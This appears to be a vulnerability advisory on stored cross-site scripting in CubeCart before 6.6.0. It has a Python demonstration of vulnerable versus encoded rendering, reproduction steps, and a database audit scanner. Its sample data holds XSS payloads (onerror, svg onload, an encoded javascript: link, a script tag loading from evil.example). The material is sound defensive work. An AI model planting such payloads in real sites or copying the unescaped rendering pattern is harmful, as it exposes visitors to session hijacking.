CubeCart Stored Cross-Site Scripting Vulnerability

Vulnerability

A stored cross-site scripting (XSS) vulnerability affects CubeCart versions prior to 6.6.0. An attacker who already holds administrative privileges can inject JavaScript into several product fields (Product Name, Description and Specification) through the admin panel. The injected markup is saved to the database and runs in the browser of anyone who later views the affected product page on the storefront, which can lead to session hijacking or to actions performed on the victim's behalf. The root cause is inadequate input sanitization and output encoding: HTML and JavaScript entered in these fields are stored verbatim and rendered without escaping. Because the attack requires an administrative account, the realistic threat is a malicious or compromised administrator.
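The following Python model, added here and not taken from CubeCart (which is PHP with Smarty templates), shows the pattern the advisory describes: a product field written verbatim into the page in element-text and attribute context, beside the same page with output encoding applied at render time. The template fragments, the field names and the payload are assumptions for the example. The check at the end parses the rendered page the way a browser would and lists any event-handler attributes it finds, which is the concrete difference between the two renderings.

```python
import html
from html.parser import HTMLParser

# Constructed payload of the kind the advisory describes. It is written to work
# both where the field lands in element text and where it lands inside a quoted
# attribute: the leading "> closes the attribute and the tag it sits in.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def render_vulnerable(name: str, specification: str) -> str:
    """Models the pre-6.6.0 behaviour: product fields are written into the
    storefront page verbatim, in both text and attribute context.
    (Hypothetical template, not CubeCart's own.)"""
    return (
        f'<h1 class="product-name">{name}</h1>\n'
        f'<img src="/images/product.jpg" alt="{name}">\n'
        f'<table><tr><th>Specification</th><td>{specification}</td></tr></table>'
    )


def encode(value: str) -> str:
    """HTML-encode a plain-text field for element text or a quoted attribute.
    quote=True also encodes " and ', which is what keeps the alt attribute
    from being broken out of."""
    return html.escape(value, quote=True)


def render_hardened(name: str, specification: str) -> str:
    """Encode at the point of output, so stored markup renders as literal text.
    A rich-text field that legitimately carries editor HTML (the Description)
    needs an allowlist sanitizer instead of encoding; that is not shown here."""
    return (
        f'<h1 class="product-name">{encode(name)}</h1>\n'
        f'<img src="/images/product.jpg" alt="{encode(name)}">\n'
        f'<table><tr><th>Specification</th><td>{encode(specification)}</td></tr></table>'
    )


class _TagCollector(HTMLParser):
    """Collects every start tag with its attributes, as a browser would parse
    them (attribute values are entity-decoded by the parser)."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_handlers(rendered: str) -> list:
    """Return (tag, attribute) pairs for every on* event-handler attribute the
    parser finds in the rendered page. An empty list means no injected
    handler survived output encoding."""
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return [
        (tag, attr)
        for tag, attrs in collector.tags
        for attr in attrs
        if attr.startswith("on")
    ]


if __name__ == "__main__":
    # Same stored values through both renderers
    vulnerable = render_vulnerable(PAYLOAD, PAYLOAD)
    hardened = render_hardened(PAYLOAD, PAYLOAD)
    print("vulnerable handlers:", injected_handlers(vulnerable))
    print("hardened handlers:  ", injected_handlers(hardened))
```

The vulnerable rendering yields three attacker-controlled img tags with an onerror handler (heading text, alt attribute and specification cell); the hardened rendering yields none, because the payload arrives in the page as `&quot;&gt;&lt;img ...` and the parser never sees a tag.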

Impact

Exploitation yields stored XSS: the injected script runs in the browser of every visitor to the affected product page, in that visitor's session context, whether they are an anonymous shopper, a logged-in customer or a store administrator browsing the storefront. From there it can read the session cookie (unless the cookie is flagged HttpOnly) and send it to an attacker-controlled host, or issue authenticated requests on the victim's behalf.

Reproduction

Log into the CubeCart admin panel with an administrative account and go to Inventory > Products. Either edit an existing product or create a new one, and place a script payload, such as a JavaScript alert, in the Product Name, Description or Specification field. Save the product and open its page on the storefront: on a vulnerable version the payload executes in the browser; on 6.6.0 or later it should no longer execute.

Remediation

Update CubeCart to version 6.6.0 or later, where this vulnerability is fixed. Because the payloads are stored in the database, upgrading does not remove content injected before the fix: audit the existing Product Name, Description and Specification fields for script tags, event-handler attributes and javascript: URLs, and clean any findings. Since the attack requires an administrative account, also keep the number of administrators small and protect those accounts with strong authentication.
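One way to run that audit, as an added example and not CubeCart's own tooling: the script below walks product records with Python's standard-library HTML parser and flags dangerous tags, on* event handlers and javascript:/vbscript:/data: URLs in URL-bearing attributes. Parsing rather than grepping matters because the parser entity-decodes attribute values, so an encoded scheme such as `&#106;avascript:` is caught. The record layout (product_id, name, description, specification), the sample rows and the tag list are assumptions for the example; in practice the rows come from an export of the product table, and ordinary editor HTML such as paragraphs and bold text is left alone.

```python
from html.parser import HTMLParser

# Tags and URL schemes that have no place in a product catalogue. The tag list
# is an assumption for this example; tune it to what your store's editor emits.
DANGEROUS_TAGS = {"script", "iframe", "frame", "object", "embed", "svg",
                  "math", "base", "meta", "link", "form"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data",
             "background"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")
FIELDS = ("name", "description", "specification")


def _normalise_url(value: str) -> str:
    # Browsers ignore surrounding whitespace and tabs/newlines inside the
    # scheme, so "java\tscript:" still executes; mirror that before matching.
    value = value.strip()
    for ch in ("\t", "\n", "\r"):
        value = value.replace(ch, "")
    return value.lower()


class _Inspector(HTMLParser):
    """Records suspicious tags, event handlers and URL schemes in one field."""

    def __init__(self, field: str):
        super().__init__()
        self.field = field
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append((self.field, "tag", tag))
        for attr, value in attrs:
            if attr.startswith("on"):
                self.findings.append((self.field, "handler", attr))
            elif (attr in URL_ATTRS and value is not None
                  and _normalise_url(value).startswith(DANGEROUS_SCHEMES)):
                self.findings.append((self.field, "url", attr))


def scan_product(record: dict) -> list:
    """Return (field, kind, detail) findings for one product record."""
    findings = []
    for field in FIELDS:
        inspector = _Inspector(field)
        inspector.feed(record.get(field) or "")
        inspector.close()
        findings.extend(inspector.findings)
    return findings


def scan_products(records: list) -> dict:
    """Map product_id -> findings for every record that has at least one."""
    flagged = {}
    for record in records:
        findings = scan_product(record)
        if findings:
            flagged[record["product_id"]] = findings
    return flagged


# Constructed sample records standing in for rows exported from the product
# table. Record 101 is a clean product with ordinary editor HTML; the other
# three carry the kinds of payload the advisory describes.
SAMPLE_RECORDS = [
    {"product_id": 101, "name": "Blue Widget",
     "description": "<p>A <b>solid</b> widget.</p>",
     "specification": "Weight: 200 g"},
    {"product_id": 102, "name": "<svg onload=alert(1)>Widget",
     "description": "<p>ok</p>", "specification": ""},
    {"product_id": 103, "name": "Red Widget",
     "description": '<p>Nice</p><a href="&#106;avascript:alert(document.domain)">deal</a>',
     "specification": None},
    {"product_id": 104, "name": "Green Widget",
     "description": "<p>Fine</p>",
     "specification": 'Depth: 5 cm<script src="https://evil.example/p.js"></script>'},
]

if __name__ == "__main__":
    for product_id, findings in scan_products(SAMPLE_RECORDS).items():
        print(product_id, findings)
```

Findings are reported per field so a cleanup can target the exact column; a hit on a rich-text Description still needs a human look, since a legitimate editor can emit links and images, but none of the flagged tags, handlers or schemes above have a legitimate use in catalogue content.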

Added: May 13, 2026, 9:32 PM
Updated: May 13, 2026, 9:32 PM

Vulnerability Rating

Custom Algorithm
spread: 5.2
impact: 5.4
exploitability: 6.0
remediation: 7.7
relevance: 8.2
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.